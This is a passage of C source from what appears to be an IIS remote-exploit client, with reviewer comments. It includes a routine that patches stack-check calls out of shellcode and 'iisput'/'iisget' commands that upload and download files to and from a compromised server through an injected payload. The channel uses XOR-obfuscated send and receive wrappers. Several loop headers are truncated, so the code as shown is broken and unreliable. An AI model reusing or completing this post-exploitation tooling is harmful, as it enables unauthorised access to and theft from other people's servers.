 * Note: the 4-byte rel32 read at shellbuff+i+1 is not bounded by len, so the last four
 * positions may read past the copied bytes (harmless here, shellbuff is 0x1000 bytes).
 */
void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len)
{
int i,k;
unsigned char temp;
char *calladd;

for(i=0;i      temp=shellbuff[i];
if(temp==0xe8){
k=*(int *)(shellbuff+i+1);
// target = address of the call + 5 + rel32, in the original image
calladd=fnadd;
calladd+=k;
calladd+=i;
calladd+=5;
if(calladd==chkesp){
shellbuff[i]=0x90;
shellbuff[i+1]=0x43;   // inc ebx
shellbuff[i+2]=0x4b;    // dec ebx
shellbuff[i+3]=0x43;
shellbuff[i+4]=0x4b;
}
}
}
}

/*
 * Console command "iisput <local file> [remote file]": upload a local file over the
 * session. Parses the two names out of str (in place, replacing the separating spaces
 * with NULs), then sends "put " + 4-byte little-endian size + remote name at offset 8,
 * followed by the file content in 0x800-byte chunks through newsend() (XOR-encoded).
 * The payload's "put " handler in shellcodefn() is the receiving side.
 *
 * fd:  connected socket
 * str: the rest of the console line after the word "iisput"
 *
 * Review notes:
 *  - filename=="\x0" compares pointers, not contents; it only works if the compiler pools
 *    the "\0" and "\x0" literals into one object. *filename==0 would be the intended test.
 *  - fpt is declared FILE* but holds a Win32 HANDLE from CreateFile(); CreateFile and
 *    GetFileSize results are not checked, so a missing file makes the loop below spin.
 *  - ReadFile() failures are not handled; a read returning 0 bytes also loops forever.
 *  - the for(...) headers are truncated in this listing.
 */
void iisput(int fd,char *str){

char *filename;
char *filename2;
FILE *fpt;
char buff[0x2000];
int size=0x2000,i,j,filesize,filesizehigh;

filename="\0";
filename2="\0";
j=strlen(str);
// first token -> filename
for(i=0;i    if(*str!=' '){
filename=str;
break;
}
}
for(;i     if(*str==' ') {
*str=0;
break;
}
}
++i;
++str;
// optional second token -> filename2
for(;i      if(*str!=' '){
filename2=str;
break;
}
}
for(;i     if(*str==' ') {
*str=0;
break;
}
}

if(filename=="\x0") {
printf("\n iisput filename [path\\fiename]\n");
return;
}
if(filename2=="\x0") filename2=filename;

printf("\n begin put file:%s",filename);

j=0;
ioctlsocket(fd, FIONBIO, &j);   // blocking mode for the transfer (FIONBIO expects a u_long)

Sleep(1000);

fpt=CreateFile(filename,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
filesize=GetFileSize(fpt,&filesizehigh);
// header: "put " + size + remote name; i+0x9 is the length sent (i counts the parsed input)
strcpy(buff,"put ");
*(int *)(buff+4)=filesize;
filesize=*(int *)(buff+4);
strcpy(buff+0x8,filename2);
newsend(fd,buff,i+0x9,0);
printf("\n put file:%s to file:%s %d bytes",filename,filename2,filesize);
Sleep(1000);

while(filesize>0){
size=0x800;
ReadFile(fpt,buff,size,&size,NULL);
if(size>0){
newsend(fd,buff,size,0);
//          Sleep(0100);
filesize-=size;
}
}

CloseHandle(fpt);
j=1;
ioctlsocket(fd, FIONBIO, &j);   // back to non-blocking for the console loop

printf("\n put file ok!\n");
Sleep(1000);

}

/*
 * Console command "iisget <local file> [remote file]": download a remote file over the
 * session. Parses the two names out of str (in place), sends "get " + remote name,
 * waits for the peer's 8-byte "size" + length header (anything else received meanwhile
 * is printed), and writes the following bytes to the local file until the announced
 * length has arrived. The payload's "get " handler in shellcodefn() is the sending side.
 *
 * fd:  connected socket
 * str: the rest of the console line after the word "iisget"
 *
 * Review notes (same family of issues as iisput):
 *  - filename=="\x0" is a pointer comparison, not an empty-string test;
 *  - fpt is a FILE* holding a HANDLE; CreateFileA's result is not checked;
 *  - the file length comes from the peer unverified; a recv() of 0 (peer closed) only
 *    prints a message and the loop keeps spinning until filesize reaches 0;
 *  - the for(...) headers are truncated in this listing.
 */
void iisget(int fd,char *str){

char *filename;
char *filename2;
FILE *fpt;
char buff[0x2000];
int size=0x2000,i,j,filesize,filesizehigh;

filename="\0";
filename2="\0";
j=strlen(str);
// first token -> filename (local), optional second -> filename2 (remote)
for(i=0;i    if(*str!=' '){
filename=str;
break;
}
}
for(;i     if(*str==' ') {
*str=0;
break;
}
}
++i;
++str;
for(;i     if(*str!=' '){
filename2=str;
break;
}
}
for(;i    if(*str==' ') {
*str=0;
break;
}
}

if(filename=="\x0") {
printf("\n iisget filename [path\\fiename]\n");
return;
}
if(filename2=="\x0") filename2=filename;

printf("\n begin get file:%s",filename);

fpt=CreateFileA(filename,FILE_FLAG_WRITE_THROUGH+GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
// request: "get " + remote name; i+0x5 is the length sent (i counts the parsed input)
strcpy(buff,"get ");
strcpy(buff+0x4,filename2);
newsend(fd,buff,i+0x5,0);
printf("\n get file:%s from file:%s",filename,filename2);

j=0;
ioctlsocket(fd, FIONBIO, &j);   // blocking mode for the transfer (FIONBIO expects a u_long)

i=0;
filesize=0;

// Wait for the "size" header: j counts consecutive empty receives (up to 100); other
// data resets the counter and is printed as it is presumably shell output.
j=0;
while(j<100){
//  Sleep(100);
i=newrecv(fd,buff,0x800,0);
if(i>0){
buff[i]=0;
if(memcmp(buff,"size",4)==0){
filesize=*(int *)(buff+4);
j=100;
}
else {
j=0;
printf("\n recv %s",buff);
}
}
else ++j;
// if(j>1000) i=0;
}

printf("\n file %d bytes %d\n",filesize,i);
// Bytes that arrived together with the 8-byte header are the first chunk of the file.
if(i>8){
i-=8;
WriteFile(fpt,buff+8,i,&i,NULL);
filesize-=i;
}

while(filesize>0){
size=newrecv(fd,buff,0x800,0);
if(size>0){
WriteFile(fpt,buff,size,&size,NULL);
filesize-=size;
}
else {
if(size==0) {
printf("\n ftp close \n ");   // connection closed, but the loop does not stop
}
else {
printf("\n Sleep(100)");
Sleep(100);
}
}

}
CloseHandle(fpt);
printf("\n get file ok!\n");
j=1;
ioctlsocket(fd, FIONBIO, &j);   // back to non-blocking for the console loop
}

/*
 * recv() wrapper for the session. Receives up to size bytes into buff and, once the
 * peer has sent "XORDATA" (xordatabegin==1), XOR-decodes them in place with the receive
 * keystream: lockintvar1 = (lockintvar1*0x100) % LOCKBIGNUM per byte, low byte used.
 * Returns recv()'s result unchanged (byte count, 0 on close, negative on error).
 * The for(...) header is truncated in this listing; presumably it runs over the k bytes
 * received, so a negative return leaves the keystream untouched.
 */
int newrecv(int fd,char *buff,int size,int flag)
{

int i,k;
k=recv(fd,buff,size,flag);
if(xordatabegin==1){
for(i=0;i               lockintvar1=lockintvar1*0x100;
lockintvar1=lockintvar1%LOCKBIGNUM;
lockcharvar=lockintvar1%0x100;
buff[i]^=lockcharvar;
}
}
return(k);
}

/*
 * send() wrapper for the session. XOR-encodes the caller's buffer IN PLACE with the send
 * keystream (lockintvar2 = (lockintvar2*0x100) % LOCKBIGNUM per byte, low byte used) and
 * then sends it. Unlike newrecv() this does not check xordatabegin, so it must only be
 * called once the peer has switched to the XOR stream. Returns send()'s result.
 * Callers must not reuse buff as plain text afterwards. The for(...) header is truncated
 * in this listing; presumably it runs over size bytes.
 */
int newsend(int fd,char *buff,int size,int flag)
{

int i;
for(i=0;i               lockintvar2=lockintvar2*0x100;
lockintvar2=lockintvar2%LOCKBIGNUM;
lockcharvar=lockintvar2%0x100;
buff[i]^=lockcharvar;
}
return(send(fd,buff,size,flag));
}